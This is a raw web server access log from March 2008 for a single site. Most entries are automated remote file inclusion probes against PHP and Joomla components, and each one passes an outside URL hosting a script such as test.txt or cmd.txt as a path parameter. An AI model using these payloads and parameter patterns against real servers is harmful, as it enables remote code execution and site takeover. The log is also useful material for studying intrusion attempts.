85.234.144.44 - - [02/Mar/2008:04:57:47 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:57:47 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:57:48 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:57:58 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:04:58:01 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:04:58:01 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:58:03 -0800] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:58:03 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:58:03 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:04:58:04 -0800] "GET /logs/access_080221.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:04:58:06 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:04:58:07 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
67.195.58.179 - - [02/Mar/2008:04:58:17 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:04:58:30 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:58:55 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:58:55 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:58:58 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:59:01 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:59:04 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.36.2.2 - - [02/Mar/2008:04:59:06 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.53.9.66 - - [02/Mar/2008:04:59:11 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.53.9.66 - - [02/Mar/2008:04:59:11 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:59:45 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:59:46 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:04:59:47 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.9.138 - - [02/Mar/2008:05:00:14 -0800] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:01:05 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:01:05 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:01:06 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:05:01:19 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:05:01:19 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [02/Mar/2008:05:01:20 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:05:01:21 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:05:01:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:05:01:35 -0800] "GET /logs/access_080221.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:01:38 -0800] "GET /logs/access_080122.log/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:01:38 -0800] "GET /index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:01:39 -0800] "GET /logs/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:05:01:43 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:05:01:43 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:05:01:47 -0800] "GET /logs/access_080207.log//config.php?path_to_root=http://www.s2doss2.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:05:01:47 -0800] "GET //config.php?path_to_root=http://www.s2doss2.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [02/Mar/2008:05:01:48 -0800] "GET /logs//config.php?path_to_root=http://www.s2doss2.kit.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:05:01:48 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:05:01:48 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:05:01:48 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
128.187.29.51 - - [02/Mar/2008:05:02:17 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
128.187.29.51 - - [02/Mar/2008:05:02:18 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.6.24.41 - - [02/Mar/2008:05:02:46 -0800] "GET /logs/access_070816.log HTTP/1.0" 200 48263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:03:00 -0800] "GET /logs/access_080216.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:03:00 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:03:01 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:03:06 -0800] "GET /logs/access_080211.log/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:03:07 -0800] "GET /index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [02/Mar/2008:05:03:07 -0800] "GET /logs/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:05:03:21 -0800] "GET /logs/access_080208.log//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.181 - - [02/Mar/2008:05:03:34 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.41.19 - - [02/Mar/2008:05:03:56 -0800] "GET //?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
208.116.41.19 - - [02/Mar/2008:05:03:56 -0800] "GET /logs//?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 200 36979 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:04:48 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:04:48 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:04:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:04:50 -0800] "GET /logs/access_080122.log/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:04:50 -0800] "GET /index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:05:04:51 -0800] "GET /logs/index.php?dir=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:05:24 -0800] "GET /logs/access_080126.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:05:06:00 -0800] "GET /logs/access.log/include/functions_common.php?gl_root_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:05:06:01 -0800] "GET /logs/access.log/include/functions_common.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
195.117.237.134 - - [02/Mar/2008:05:06:14 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:05:06:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:06:22 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:06:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [02/Mar/2008:05:06:31 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:05:06:32 -0800] "GET /logs/access_080221.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.36.165 - - [02/Mar/2008:05:07:00 -0800] "GET /errors.php?error=http://www.suspended.by.ru/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:05:07:28 -0800] "GET /index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.34.140.130 - - [02/Mar/2008:05:07:28 -0800] "GET /logs/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://media.bakuland.com/apache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:07:30 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:05:07:31 -0800] "GET /logs/access_080216.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:05:07:32 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.241 - - [02/Mar/2008:05:07:54 -0800] "GET /logs/access_080215.log//user.php?xoops_redirect=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.241 - - [02/Mar/2008:05:07:55 -0800] "GET //user.php?xoops_redirect=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.120.5.241 - - [02/Mar/2008:05:07:55 -0800] "GET /logs//user.php?xoops_redirect=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:05:08:35 -0800] "GET /index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
81.92.222.169 - - [02/Mar/2008:05:08:36 -0800] "GET /logs/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:08:47 -0800] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [02/Mar/2008:05:09:08 -0800] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:05:09:13 -0800] "GET //components/com_minibb.php?absolute_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:05:09:14 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:09:15 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:09:16 -0800] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:09:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:05:09:46 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [02/Mar/2008:05:09:48 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.232.118.239 - - [02/Mar/2008:05:09:48 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:05:10:12 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.26.63.12 - - [02/Mar/2008:05:10:26 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.26.63.12 - - [02/Mar/2008:05:10:27 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:05:10:38 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
